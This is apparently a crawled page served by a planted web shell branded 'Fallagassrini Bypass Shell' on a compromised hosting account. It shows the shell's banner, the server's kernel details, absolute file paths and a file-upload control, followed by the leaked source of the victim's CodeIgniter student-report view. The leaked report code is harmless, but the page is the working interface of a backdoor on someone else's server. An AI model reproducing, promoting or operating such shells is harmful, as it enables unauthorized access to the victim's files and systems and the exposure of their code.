? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/www/savoyglobal.net/oscardraft/application/views/report/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/www/savoyglobal.net/oscardraft/application/views/report/view_student_list_report.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');
?>
<div class="icons_main">
    <div  class="icons">
        <img src="<?= base_url() ?>assets/images/back.png" title="Back" class="clickimage" onclick="viewdata('report','viewinreportsearch','search_report','view_report','<?= $_SESSION['pagenum']; ?>')" alt="Back" align = "center" width="32" height="32"  />
    </div>
    <div class="icons_caption">
        <h4>Student Class List Report</h4>
    </div>
</div>
<?php
$attributes = array('id' => 'validateform', 'class' => 'validate');
echo form_open('report/generate_report/get_student_list_report/_student_list_report', $attributes);
?>
<div class="clean"></div> 

<div class="grid_6">
    <div class="box">
        <div class="header main no-icon">Student List
            <span></span>
        </div>
        <div class="content no-padding">
            <table class="table">
                <tr><th colspan='2' style="text-align: center"> Select Class</th></tr>
                <tr>
                    <td>
                        Class
                    </td>
                    <td>
                        <?php
                        $class = $this->mastermodel->getdatas('class_room', 'class_room_id');
//                        var_dump($class);
                        ?>
                        <select name="class_room_id" class="required" id="class_room_id">
                            <option value="">All</option>
                            <?php
                            foreach ($class as $list) 
                            {
                            ?>
                                <option value="<?= $list['class_room_id'] ?>"><?= $list['class_room_name'] ?></option>
                            <?php 
                            }
                            ?>
                        </select> 
                    </td>
                </tr>
            </table>    
            <br/>
            <br/>
            <br/>
            <br/>
            <br/>
            <br/>
        </div>
        <div class="actions">
            <div class="actions-left">
                <input type="reset">
            </div>
            <div class="actions-right">
                <button style="margin-left: 130px;" type="submit" id="submit" class="clickimage"  >Generate</button>
            </div>
        </div>
    </div>
</div>
<input type="hidden" name="report_type" value="xls"/>
<div class="grid_12">
    <div class="box"> 
    </div>
</div>
<?php echo form_close(); ?>
<div id="loadresult"></div>


<?php

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net